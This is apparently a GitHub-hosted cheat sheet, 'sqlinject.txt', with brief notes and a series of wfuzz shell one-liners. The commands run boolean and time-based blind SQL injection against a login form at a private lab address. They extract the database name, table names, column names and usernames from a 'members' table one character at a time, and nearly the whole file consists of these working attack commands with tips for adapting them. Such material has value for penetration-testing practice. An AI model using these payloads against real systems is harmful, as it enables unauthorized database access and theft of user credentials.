-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathsqlinject.txt
executable file
·47 lines (23 loc) · 3.18 KB
/
sqlinject.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#modify the value of the argument "d" to your exactly payload.if your payload is GET method,you should not to use the "d" argument
#but the main payload you should not modify its. like "(ascii(substr((select column_name from information_schema.columns where table_name="
#take care of the "Condition string", "or" and "and" may led to different result,or you may not find it vulnerbal
#to change the mysql result row,just modify the "limit" query optimization,"limit 0,1" is the first data row,and "limit 1,1" is the second data row.
#the hide char argument "--hh" is also up to diffrent situation,too.
#the "grep" linux shell can filter the useful information for us.but the filter vaule is up to the diffrent situation
#In "Bool injection",my "grep" filter by the ID number of the result of wfuzz
#In "Time injection",my "grep" filter by the reponse time.notice that in "Time injection",I use the "v" argument in wfuzz to output the reponse time
fuzz order by
wfuzz -z range,1-10 -d "myusername=aa&mypassword=' order by FUZZ#&Submit=Login" http://192.168.92.146/checklogin.php
fuzz the current database
for i in $(seq 1 20);do wfuzz --hh 109 -z range,32-127 -d "myusername=aa&mypassword=1' or (select (ord(right(left((select database()),$i),1)) = FUZZ))#Submit=Login" http://192.168.92.146/checklogin.php | grep '000'; done
for i in $(seq 1 20);do wfuzz -v -z range,32-127 -d "myusername=aa&mypassword=1' or if((select ord(right(left((select database()),$i),1)))=FUZZ,sleep(2),1)#Submit=Login" http://192.168.92.146/checklogin.php | grep '4\.'; done
fuzz the tables
for i in $(seq 1 10); do wfuzz -z range,32-127 -d "myusername=aa&mypassword=1' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),$i,1)))=FUZZ #&Submit=Login" http://192.168.92.146/checklogin.php | grep '000';done
for i in $(seq 1 10); do wfuzz -v -z range,32-127 -d "myusername=aa&mypassword=1' or if((select ascii(substr(table_name,$i,1))from information_schema.tables where table_schema=database() limit 0,1)=FUZZ, sleep(2),1) #&Submit=Login" http://192.168.92.146/checklogin.php | grep '4\.';done
fuzz the columns
for i in $(seq 1 10); do wfuzz --hh 109 -z range,32-127 -d "myusername=aa&mypassword=1' or (ascii(substr((select column_name from information_schema.columns where table_name='members' limit 1,1),$i,1)))=FUZZ #&Submit=Login" http://192.168.92.146/checklogin.php | grep '000';done
for i in $(seq 1 10); do wfuzz -v -z range,32-127 -d "myusername=aa&mypassword=1' or if((select ascii(substr(column_name,$i,1))from information_schema.columns where table_name='members' limit 1,1)=FUZZ, sleep(2),1) #&Submit=Login" http://192.168.92.146/checklogin.php | grep '4\.';done
fuzz the data
for i in $(seq 1 10); do wfuzz --hh 109 -z range,32-127 -d "myusername=aa&mypassword=1' or (ascii(substr((select username from members limit 1,1),$i,1)))=FUZZ #&Submit=Login" http://192.168.92.146/checklogin.php | grep '000';done
for i in $(seq 1 10); do wfuzz -v -z range,32-127 -d "myusername=aa&mypassword=1' or if((select ascii(substr(username,$i,1))from members limit 0,1)=FUZZ, sleep(2),1) #&Submit=Login" http://192.168.92.146/checklogin.php | grep '4\.';done
myusername=aaab&mypassword=bbbb&Submit=Login